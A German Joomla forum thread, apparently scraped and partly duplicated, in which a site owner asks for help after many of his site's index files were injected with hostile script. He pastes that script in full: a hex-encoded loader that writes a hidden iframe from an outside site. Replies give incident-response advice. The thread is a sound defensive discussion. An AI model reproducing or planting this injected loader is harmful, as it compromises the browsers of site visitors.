Joomla! 1.5.3 gehackt

norbu · Registriert seit: 18.01.2007

Beim Aufruf meiner Seite, die unverändert seit ca. 3 Monaten problemlos gelaufen ist kam plötzlich nur noch die Meldung:
"Parse error: parse error, unexpected '<' in /home/www/yyyxxx/html/xxxxx/index.php on line 89"
Der Grund war, daß aus unerfindlichen Gründen in vielen Dateien index.php und index.html und z.B. auch in der Datei, die zur Authentifizierung für google-webmastertools auf dem Server liegt, ein fremdes Script enthalten war.
Als Subdomain habe ich auf dem Server auch eine coppermine Bilddatenbank. Auch in dieser waren in vielen Dateien dieselben Scripte integriert.
Nachdem ich aus allen Dateien das Script entfernt habe, läuft alles wieder gut.
Wie kann man sich vor sochlen Zugriffen schützen?

Hier das Script, das in allen Dateien dasselbe war:
<script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857aa739cd0a(){return 16;} return (parseInt(m4857aa739c91a,m4857aa739cd0a()));}funct ion m4857aa739d4f5(m4857aa739d8ed){ var m4857aa739e4d4=2; var m4857aa739dce4='';m4857aa739ecc3=String.fromCharCo de;for(m4857aa739e0dd=0;m4857aa739e0dd<m4857aa739d 8ed.length;m4857aa739e0dd+=m4857aa739e4d4){ m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739 c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa7 39e4d4))));}return m4857aa739dce4;} var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20 636865636B5F636F6E74656E7428297B76617220693D303B77 68696C6528646F63756D656E742E676574456C656D656E7473 42795461674E616D652827696672616D6527292E6C656E6774 68297B76617220656C3D646F63756D656E742E676574456C65 6D656E747342795461674E616D652827696672616D6527295B 695D3B6966282028656C2E7374796C652E646973706C61793D 3D276E6F6E6527207C7C20656C2E7374796C652E7669736962 696C697479203D3D2768696464656E27207C7C2028656C2E77 696474683C3520262620656C2E6865696768743C3529292026 2620656C2E6E616D65213D27633127297B656C2E706172656E 744E6F64652E72656D6F76654368696C6428656C293B7D656C 736520692B2B3B7D7D636865636B5F636F6E74656E7428293B 0A696628216D796961297B646F63756D656E742E7772697465 28756E65736361706528202725336325363925363625373225 36312536642536352532302536652536312536642536352533 64253633253331253230253733253732253633253364253237 25363825373425373425373025336125326625326625373625 36392537362536392537342537352537332536332536392536 31253265253633253666253664253266253639253664253631 25363725363525373325326625373325373425363125373425 37332532652536382537342536642536632533662532372532 62253464253631253734253638253265253732253666253735 25366525363425323825346425363125373425363825326525 37322536312536652536342536662536642532382532392532 61253331253336253339253331253332253338253239253262 25323725333625363625363525333925363525333825363425 33302536312533312533362532372532302537372536392536 34253734253638253364253337253338253333253230253638 25363525363925363725363825373425336425333225333125 33362532302537332537342537392536632536352533642532 37253634253639253733253730253663253631253739253361 25323025366525366625366525363525323725336525336325 32662536392536362537322536312536642536352533652729 293B7D766172206D7969613D747275653B3C2F736372697074 3E';document.write(m4857aa739d4f5(m4857aa739f0bb)) ;</script>

Der Hoster (hotdomains.at) hat mir geschrieben: "Die Ursache ist ein Google-Script das sich in die Datein über den Google-Banner eingeschlichen hat. Wir hatten seit 17.06.08 nachmittag mehrere solche Meldungen und es wahr immer das Google-Script und immer nur bei Kunden die mit Joomla arbeiten.
Nachdem Sie den Werbebanner von Google eingebaut haben wurde der Banner nicht von unseren Server blockiert und somit konnte das Script eindringen."

Sind adsense google Anzeigen(codes) problematisch?

EDIT:
http://www.joomlaportal.de/sicherhei...ogle-info.html

flotte · Registriert seit: 20.03.2005

Zitat:

Zitat von norbu

Der Hoster (hotdomains.at) hat mir geschrieben: "Die Ursache ist ein Google-Script das sich in die Datein über den Google-Banner eingeschlichen hat. Wir hatten seit 17.06.08 nachmittag mehrere solche Meldungen und es wahr immer das Google-Script und immer nur bei Kunden die mit Joomla arbeiten.
Nachdem Sie den Werbebanner von Google eingebaut haben wurde der Banner nicht von unseren Server blockiert und somit konnte das Script eindringen."

Wie bitte? Google hackt neuerdings? Wohl kaum...
Eventuell ist aber eine Modul/Komponente unsicher, welches in Deinem Joomla die Google-Ads einblendet.

Hol Dir die Logs und finde die Lücke. Ansonsten wirst Du keine Ruhe haben.
Beachte das der Angreifer vollen Zugriff auf Deinen Webspace hatte und problemlos seine Shell-Scripte verstecken konnte.
Deswegen der Standard-Rat:
1) Sofort den gesamten Auftritt mit allen Dateien entfernen (sichern!)
2) Datenbankinhalt entfernen
3) Letzte definitv saubere Sicherung einspielen
4) Alle Passwörter ändern (Datenbank, Joomla, FTP, etc.)
5) Log-Dateien holen und Einbruchslücke lokalisieren
6) Lücke schließen!

norbu · Registriert seit: 18.01.2007

Hallo,
und vielen Dank für die schnelle Antwort. Mein Hoster hat inzwischen geschrieben, daß jetzt bei mehreren Hostern diese Probleme mit Joomla aufgetreten seien.
Ich verwende für die google - Anzeige das Standard - Jommla! Modul "mod_custom". Vor dem Erstellen, muß man umstellen auf "ohne Editor", damit richtig abgespeichert wird.
Was ist daran falsch?
Muß ich wirklich auch die Datenbank tauschen?
Die gesamte Seite habe ich inzwischen lokal auf den Rechner geladen und auf Fehler untersucht und wie beschrieben, die Datein online gelöscht und getauscht.

flotte · Registriert seit: 20.03.2005

Zitat:

Zitat von norbu

Mein Hoster hat inzwischen geschrieben, daß jetzt bei mehreren Hostern diese Probleme mit Joomla aufgetreten seien.

Hier wäre detailliertere Angaben notwendig. Bislang ist mir persönlich noch keine Sicherheitslücke in Verbindung mit mod_custum und Google bekannt.
Was sagen denn die Logs? Ist der Angreifer identifiziert und konntest Du überprüfen, welche Dateien er "angepackt" hat. Das liefert Dir Hinweise auf mögliche versteckte Shell-Scripte, sofern Du keine saubere SIcherung hast.

Zitat:

Muß ich wirklich auch die Datenbank tauschen?

Wenn Dateien geändert wurde, hatte der User Vollzugriff und konnte auch den Datenbankinhalt verändern. Prüfe wenigstens ob er nicht weitere Super-Admins angelegt hat oder ob er bestehende Passwörter ersetzt hat. Da stecken durchaus Gefahren...
Allerdings passiert das eher selten, das die Datenbanken in Mitleidenschaft gezogen werden. Wenn, dann werden sie einfach gelöscht.

holmi · Registriert seit: 30.08.2004

Schaut mal hier:
http://www.joomlaportal.de/sicherhei...tml#post666372

Ich denke du hattest auch den
http://www.analytics-google.info Code drin, das ist nicht von Google!
Zumindest ist die Verschlüsselte <script>function c1131313m4857aa739c121(m4857aa739c91a) identisch.

Björn

norbu · Registriert seit: 18.01.2007

Hier erst mal die Antwort zu den Fragen:
Laut Hoster ist die Datenbank nicht betroffen. Ich hatte allerdings die letzte Sicherung sofort nach dem Auftreten des Problems mit mysqldumper eingespielt.

Manipuliert im Root waren
index.php
und meine google-Webmaster Identifizierung xxx.html

in den Verzeichnissen \admininistrator\, \xmlrpc\ die index.php

in den Verzeichnissen \cache\, \components\, \images\, \includes\, \language\, \libraries\, \logs\, \media\, \modules\, \plugins\, \templates\, \tmp\ jeweils die index.html

Außerdem waren in mysqldumper, den ich zur Datenbanksicherung verwende die index.php und die main.php betroffen.
In meiner Bilddatenbank coppermine, die als Subdomain in einem Verzeichnis liegt, waren ebenfalls viele Dateien betroffen.
In allen betroffenen Dateien war das Script enthalten, das ich als Estes gepostet habe.

Ich habe den Hoster nach Infos über die Angreifer gefragt. Wenn ich etwas erfahre, werde ich es hier posten.

Noch läuft alles gut, nachdem ich alle beschädigten Dateien mit den Orginalen ersetzt habe.

Wo kann ich einem Log nachsehen was geschehen ist?

Danke, Norbert

flotte · Registriert seit: 20.03.2005

Zitat:

Zitat von norbu

Wo kann ich einem Log nachsehen was geschehen ist?

In dem Log findest Du alle Aktivitäten in Deinem Web. Also jeden geklickten Link, jeden Aufruf etc. Verzeichnet sind aud die IPs, Herkunftsinformationen, Agents etc. Hast Du IP erst einmal ermittelt, kannst Du wunderbar danach filtern und genau sehen, welche Aufrufe getätigt wurden.

norbu · Registriert seit: 18.01.2007

Vielen Dank Uwe,

ich habe die Logs vom Hoster auf den Rechner geladen.
Gibt es Programme zur einfachen Auswertung der Dateien, am besten freeware? Nach was muß ich suchen, bzw. welche Vorgänge sind als verdächtig einzustufen?
Im Moment habe ich mit OpenOffice geöffnet, aber das ist leider nicht übersichtlich.

Gruß, Norbert

Joe Sixpack · Registriert seit: 28.03.2007

Hi

ich habe da mal eine Frage am Rande an die Spezialisten:

wenn man Komponenten, Plugins etc installiert hat, die evt nicht sicher sind, diese jedoch nicht aktiviert hat, sind diese dann immer noch ein Sicherheitsrisiko?

Bei mir ist es oft so, dass man mal jene und mal diese Komponente kurz installiert, jedoch zum Schluss kommt das man sie nicht braucht und dann vielleicht vergisst zu deinstallieren.

Unsichere Komponente xyz ist also noch auf dem Server, aber nicht aktiv. Können Hacker auf solche Komponenten, Plugins zugreiffen?

besten Dank

Joe

flotte · Registriert seit: 20.03.2005

Zitat:

Zitat von Joe Sixpack

wenn man Komponenten, Plugins etc installiert hat, die evt nicht sicher sind, diese jedoch nicht aktiviert hat, sind diese dann immer noch ein Sicherheitsrisiko?

Klares JA!!
Nicht benutztes immer deinstallieren!

Zu den Logs:
Wie man die untersucht kann ich hier nicht schildern. Ohne guten Texteditor kommst Du da aber nicht weit. OpenOffice ist hier nicht die sinnvollste Lösung.
Benutze Hinweise, um in den Logs den besten Einstiegspunkt zu finden. Beispielsweise die Dateiennamen und die Zeitpunkte der Änderungen. Wenn Du eine Aktion gefunden hast, kannst Du nach der dort aktiven IP filtern. So tastet man sich an die Ereignisse am besten heran. Es gibt keine Software die Dir das abnimmt, das ist Handarbeit.

Themen-Optionen	Thema durchsuchen
Druckbare Version zeigen Diese Seite per E-Mail verschicken	Thema durchsuchen: Erweiterte Suche
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln


norbu Joomla Newbie Registriert seit: 18.01.2007 Ort: 82481 Mittenwald Beiträge: 21 Bedankte sich: 12 0 Danksagungen in 0 Beiträgen	Joomla! 1.5.3 gehackt Beim Aufruf meiner Seite, die unverändert seit ca. 3 Monaten problemlos gelaufen ist kam plötzlich nur noch die Meldung: "Parse error: parse error, unexpected '<' in /home/www/yyyxxx/html/xxxxx/index.php on line 89" Der Grund war, daß aus unerfindlichen Gründen in vielen Dateien index.php und index.html und z.B. auch in der Datei, die zur Authentifizierung für google-webmastertools auf dem Server liegt, ein fremdes Script enthalten war. Als Subdomain habe ich auf dem Server auch eine coppermine Bilddatenbank. Auch in dieser waren in vielen Dateien dieselben Scripte integriert. Nachdem ich aus allen Dateien das Script entfernt habe, läuft alles wieder gut. Wie kann man sich vor sochlen Zugriffen schützen? Hier das Script, das in allen Dateien dasselbe war: <script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857aa739cd0a(){return 16;} return (parseInt(m4857aa739c91a,m4857aa739cd0a()));}funct ion m4857aa739d4f5(m4857aa739d8ed){ var m4857aa739e4d4=2; var m4857aa739dce4='';m4857aa739ecc3=String.fromCharCo de;for(m4857aa739e0dd=0;m4857aa739e0dd<m4857aa739d 8ed.length;m4857aa739e0dd+=m4857aa739e4d4){ m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739 c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa7 39e4d4))));}return m4857aa739dce4;} var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20 636865636B5F636F6E74656E7428297B76617220693D303B77 68696C6528646F63756D656E742E676574456C656D656E7473 42795461674E616D652827696672616D6527292E6C656E6774 68297B76617220656C3D646F63756D656E742E676574456C65 6D656E747342795461674E616D652827696672616D6527295B 695D3B6966282028656C2E7374796C652E646973706C61793D 3D276E6F6E6527207C7C20656C2E7374796C652E7669736962 696C697479203D3D2768696464656E27207C7C2028656C2E77 696474683C3520262620656C2E6865696768743C3529292026 2620656C2E6E616D65213D27633127297B656C2E706172656E 744E6F64652E72656D6F76654368696C6428656C293B7D656C 736520692B2B3B7D7D636865636B5F636F6E74656E7428293B 0A696628216D796961297B646F63756D656E742E7772697465 28756E65736361706528202725336325363925363625373225 36312536642536352532302536652536312536642536352533 64253633253331253230253733253732253633253364253237 25363825373425373425373025336125326625326625373625 36392537362536392537342537352537332536332536392536 31253265253633253666253664253266253639253664253631 25363725363525373325326625373325373425363125373425 37332532652536382537342536642536632533662532372532 62253464253631253734253638253265253732253666253735 25366525363425323825346425363125373425363825326525 37322536312536652536342536662536642532382532392532 61253331253336253339253331253332253338253239253262 25323725333625363625363525333925363525333825363425 33302536312533312533362532372532302537372536392536 34253734253638253364253337253338253333253230253638 25363525363925363725363825373425336425333225333125 33362532302537332537342537392536632536352533642532 37253634253639253733253730253663253631253739253361 25323025366525366625366525363525323725336525336325 32662536392536362537322536312536642536352533652729 293B7D766172206D7969613D747275653B3C2F736372697074 3E';document.write(m4857aa739d4f5(m4857aa739f0bb)) ;</script> Der Hoster (hotdomains.at) hat mir geschrieben: "Die Ursache ist ein Google-Script das sich in die Datein über den Google-Banner eingeschlichen hat. Wir hatten seit 17.06.08 nachmittag mehrere solche Meldungen und es wahr immer das Google-Script und immer nur bei Kunden die mit Joomla arbeiten. Nachdem Sie den Werbebanner von Google eingebaut haben wurde der Banner nicht von unseren Server blockiert und somit konnte das Script eindringen." Sind adsense google Anzeigen(codes) problematisch? EDIT: http://www.joomlaportal.de/sicherhei...ogle-info.html Geändert von holmi (20.06.2008 um 12:01 Uhr). Grund: Link zur Zusammenfassung


holmi Moderator Wohnort auf der Karte Registriert seit: 30.08.2004 Ort: Harz Beiträge: 6,492 Bedankte sich: 91 1,229 Danksagungen in 1,130 Beiträgen	Schaut mal hier: http://www.joomlaportal.de/sicherhei...tml#post666372 Ich denke du hattest auch den http://www.analytics-google.info Code drin, das ist nicht von Google! Zumindest ist die Verschlüsselte <script>function c1131313m4857aa739c121(m4857aa739c91a) identisch. Björn __________________ Problem gelöst? Dann markiere den Thread mit [GELÖST]


norbu Joomla Newbie Registriert seit: 18.01.2007 Ort: 82481 Mittenwald Beiträge: 21 Bedankte sich: 12 0 Danksagungen in 0 Beiträgen	Wie kann ich vor weiteren Angriffen sicher sein? Hier erst mal die Antwort zu den Fragen: Laut Hoster ist die Datenbank nicht betroffen. Ich hatte allerdings die letzte Sicherung sofort nach dem Auftreten des Problems mit mysqldumper eingespielt. Manipuliert im Root waren index.php und meine google-Webmaster Identifizierung xxx.html in den Verzeichnissen \admininistrator\, \xmlrpc\ die index.php in den Verzeichnissen \cache\, \components\, \images\, \includes\, \language\, \libraries\, \logs\, \media\, \modules\, \plugins\, \templates\, \tmp\ jeweils die index.html Außerdem waren in mysqldumper, den ich zur Datenbanksicherung verwende die index.php und die main.php betroffen. In meiner Bilddatenbank coppermine, die als Subdomain in einem Verzeichnis liegt, waren ebenfalls viele Dateien betroffen. In allen betroffenen Dateien war das Script enthalten, das ich als Estes gepostet habe. Ich habe den Hoster nach Infos über die Angreifer gefragt. Wenn ich etwas erfahre, werde ich es hier posten. Noch läuft alles gut, nachdem ich alle beschädigten Dateien mit den Orginalen ersetzt habe. Wo kann ich einem Log nachsehen was geschehen ist? Danke, Norbert


norbu Joomla Newbie Registriert seit: 18.01.2007 Ort: 82481 Mittenwald Beiträge: 21 Bedankte sich: 12 0 Danksagungen in 0 Beiträgen	Logauswertung Vielen Dank Uwe, ich habe die Logs vom Hoster auf den Rechner geladen. Gibt es Programme zur einfachen Auswertung der Dateien, am besten freeware? Nach was muß ich suchen, bzw. welche Vorgänge sind als verdächtig einzustufen? Im Moment habe ich mit OpenOffice geöffnet, aber das ist leider nicht übersichtlich. Gruß, Norbert


Joe Sixpack Joomlapapst Registriert seit: 28.03.2007 Ort: Schweizer Berge Beiträge: 775 Bedankte sich: 82 190 Danksagungen in 157 Beiträgen	Hi ich habe da mal eine Frage am Rande an die Spezialisten: wenn man Komponenten, Plugins etc installiert hat, die evt nicht sicher sind, diese jedoch nicht aktiviert hat, sind diese dann immer noch ein Sicherheitsrisiko? Bei mir ist es oft so, dass man mal jene und mal diese Komponente kurz installiert, jedoch zum Schluss kommt das man sie nicht braucht und dann vielleicht vergisst zu deinstallieren. Unsichere Komponente xyz ist also noch auf dem Server, aber nicht aktiv. Können Hacker auf solche Komponenten, Plugins zugreiffen? besten Dank Joe